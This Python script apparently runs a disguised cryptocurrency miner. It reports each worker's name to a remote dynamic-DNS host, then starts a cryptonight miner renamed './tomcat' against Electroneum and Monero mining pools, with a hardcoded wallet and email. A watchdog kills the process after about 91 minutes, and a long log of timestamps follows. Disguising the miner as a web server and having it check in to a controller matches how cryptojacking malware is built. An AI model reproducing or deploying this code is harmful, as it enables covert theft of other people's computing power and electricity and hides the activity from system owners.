import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:01.688817
#2018-02-17 16:57:04.625886
#2018-02-17 18:44:07.573001
#2018-02-17 20:34:02.040143
#2018-02-17 22:20:07.171545
#2018-02-18 00:04:04.441209
#2018-02-18 01:55:01.770430
#2018-02-18 03:43:05.206767
#2018-02-18 05:30:05.420535
#2018-02-18 07:22:06.024060
#2018-02-18 09:10:09.840373
#2018-02-18 10:56:03.553269
#2018-02-18 12:42:06.586011
#2018-02-18 14:29:05.253281
#2018-02-18 16:19:01.884203
#2018-02-18 18:09:03.817036
#2018-02-18 19:55:05.959641
#2018-02-18 21:42:07.581405
#2018-02-18 23:31:04.891983
#2018-02-19 01:17:01.664624
#2018-02-19 03:04:01.596628
#2018-02-19 04:49:06.731992
#2018-02-19 06:33:03.762352
#2018-02-19 08:22:04.418700
#2018-02-19 10:12:08.719984
#2018-02-19 12:00:09.165427
#2018-02-19 13:48:05.274365
#2018-02-19 15:36:02.216846
#2018-02-19 17:24:05.905189
#2018-02-19 19:12:01.814451
#2018-02-19 20:59:03.917563
#2018-02-19 22:47:06.633588
#2018-02-20 00:29:07.109669
#2018-02-20 02:19:01.698615
#2018-02-20 04:09:03.918005
#2018-02-20 05:52:03.662436
#2018-02-20 07:38:06.667306
#2018-02-20 09:22:06.908224
#2018-02-20 11:06:05.644948
#2018-02-20 12:53:01.763832
#2018-02-20 14:37:07.900424
#2018-02-20 16:22:08.663109
#2018-02-20 18:08:09.022423
#2018-02-20 19:59:06.156140
#2018-02-20 21:48:06.627827
#2018-02-20 23:30:08.389012
#2018-02-21 01:15:08.200148
#2018-02-21 03:03:05.990037
#2018-02-21 04:52:01.810346
#2018-02-21 06:40:03.988085
#2018-02-21 08:26:05.484717
#2018-02-21 10:12:07.297342
#2018-02-21 12:02:01.700607
#2018-02-21 13:50:09.507789
#2018-02-21 15:36:06.311916
#2018-02-21 17:26:02.248503
#2018-02-21 19:13:06.555026
#2018-02-21 20:59:09.243597
#2018-02-21 22:46:08.426745
#2018-02-22 00:36:05.788604
#2018-02-22 03:30:09.292469
#2018-02-22 05:17:07.298915
#2018-02-22 07:01:04.651412
#2018-02-22 08:48:02.095789
#2018-02-22 10:36:04.758569
#2018-02-22 12:24:01.330805
#2018-02-22 14:09:08.684334
#2018-02-22 15:57:01.848016
#2018-02-22 17:43:05.184853
#2018-02-22 19:30:06.850996
#2018-02-22 21:22:05.582468
#2018-02-22 23:11:05.854943
#2018-02-23 00:57:05.908031
#2018-02-23 02:46:01.940350
#2018-02-23 04:38:04.085670
#2018-02-23 06:24:06.432820
#2018-02-23 08:10:06.297157
#2018-02-23 10:26:08.838872
#2018-02-23 12:20:11.724318
#2018-02-23 14:09:07.914527
#2018-02-23 16:01:09.304601
#2018-02-23 17:46:08.457016
#2018-02-23 19:32:07.445000
#2018-02-23 21:15:03.926188
#2018-02-23 23:02:01.628170
#2018-02-24 00:51:05.985937
#2018-02-24 02:34:05.070434
#2018-02-24 04:27:07.619732
#2018-02-24 06:12:07.827268
#2018-02-24 08:01:01.829454
#2018-02-24 09:45:09.203127
#2018-02-24 11:40:04.683092
#2018-02-24 13:32:04.120578
#2018-02-24 15:19:07.224446
#2018-02-24 17:09:01.680877
#2018-02-24 19:00:06.078506
#2018-02-24 20:47:06.994289
#2018-02-24 23:04:01.487738
#2018-02-25 02:21:04.327892
#2018-02-25 05:59:07.238453
#2018-02-25 11:39:05.522270